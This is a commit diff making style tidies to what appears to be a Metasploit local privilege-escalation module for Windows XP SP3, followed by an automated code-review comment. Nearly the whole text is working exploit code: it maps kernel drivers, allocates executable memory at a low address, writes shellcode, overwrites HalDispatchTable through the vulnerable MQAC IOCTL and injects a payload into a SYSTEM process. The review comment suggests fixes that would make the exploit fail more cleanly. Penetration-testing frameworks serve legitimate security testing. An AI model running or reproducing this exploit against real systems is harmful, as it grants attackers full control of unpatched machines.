Minor tidies to conform to standards

bug/bundler_fix
OJ 2014-07-25 09:32:54 +10:00 committed by Joshua Smith
parent 31c51eeb63
commit 2b021e647d
1 changed files with 23 additions and 23 deletions


@ -61,10 +61,10 @@ class Metasploit3 < Msf::Exploit::Local
def find_sys_base(drvname)
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
@ -82,24 +82,24 @@ class Metasploit3 < Msf::Exploit::Local
# Function borrowed from smart_hashdump
def get_system_proc
# Make sure you got the correct SYSTEM Account Name no matter the OS Language
local_sys = resolve_sid("S-1-5-18")
local_sys = resolve_sid('S-1-5-18')
system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
this_pid = session.sys.process.getpid
# Processes that can Blue Screen a host if migrated in to
dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']
session.sys.process.processes.each do |p|
# Check we are not migrating to a process that can BSOD the host
next if dangerous_processes.include?(p["name"])
next if p["pid"] == this_pid
next if p["pid"] == 4
next if p["user"] != system_account_name
next if dangerous_processes.include?(p['name'])
next if p['pid'] == this_pid
next if p['pid'] == 4
next if p['user'] != system_account_name
return p
end
end
def open_device
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
if handle['return'] == 0
print_error('Failed to open the \\\\.\\MQAC device')
return nil
@ -110,17 +110,17 @@ class Metasploit3 < Msf::Exploit::Local
def check
handle = open_device
if handle.nil? || handle == INVALID_HANDLE_VALUE
print_error("MSMQ installation not found")
print_error('MSMQ installation not found')
return Exploit::CheckCode::Safe
end
session.railgun.kernel32.CloseHandle(handle)
os = sysinfo["OS"]
os = sysinfo['OS']
case os
when /windows xp.*service pack 3/i
return Exploit::CheckCode::Appears
when /windows xp/i
print_error("Incorrect version of Windows XP detected")
print_error('Unsupported version of Windows XP detected')
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
@ -128,16 +128,16 @@ class Metasploit3 < Msf::Exploit::Local
end
def exploit
if sysinfo["Architecture"] =~ /wow64/i
print_error("Running against WOW64 is not supported")
if sysinfo['Architecture'] =~ /wow64/i
print_error('Running against WOW64 is not supported')
return
elsif sysinfo["Architecture"] =~ /x64/
print_error("Running against 64-bit systems is not supported")
elsif sysinfo['Architecture'] =~ /x64/
print_error('Running against 64-bit systems is not supported')
return
end
if is_system?
print_error("This meterpreter session is already running as SYSTEM")
print_error('This meterpreter session is already running as SYSTEM')
return
end
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Local
this_proc = session.sys.process.open
unless this_proc.memory.writable?(base_addr)
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
end
unless this_proc.memory.writable?(base_addr)
print_error('Failed to properly allocate memory')
@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Local
hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
hKernel = hKernel['return']
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
halDispatchTable = halDispatchTable['return']
halDispatchTable -= hKernel
halDispatchTable += kernel_info[0]
@ -192,19 +192,19 @@ class Metasploit3 < Msf::Exploit::Local
this_proc.memory.write(0x1, shellcode)
this_proc.close
print_status("Triggering vulnerable IOCTL")
print_status('Triggering vulnerable IOCTL')
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
unless is_system?
print_error("Exploit failed")
print_error('Exploit failed')
return
end
proc = get_system_proc
print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
unless execute_shellcode(payload.encoded, nil, proc['pid'])
fail_with(Failure::Unknown, "Error while executing the payload")
fail_with(Failure::Unknown, 'Error while executing the payload')
end
end
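Review bot: `proc = get_system_proc` followed by `proc['name']` has no failure guard, and get_system_proc as shown never returns nil — when no eligible process passes the `next` filters, its `session.sys.process.processes.each` block falls through and the method returns whatever `each` returns (likely the process collection itself), so the call site would raise a TypeError instead of reporting the failure. In get_system_proc, add `nil` as the final expression after the `each` block, and guard the call site with `fail_with(Failure::NotFound, 'No suitable SYSTEM process found') if proc.nil?`. While there, `proc` shadows `Kernel#proc` (rename it to `sys_proc`), and `result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)` assigns a local that nothing in the hunk reads, so the assignment can be dropped. In the first hunk, `if not session.railgun.dlls.keys.include?('psapi')` reads more idiomatically as `unless session.railgun.dlls.key?('psapi')` (assuming `dlls` is a Hash, as `.keys` suggests), which fits this commit's standards pass. The `exploit` method this hunk closes begins in an earlier hunk.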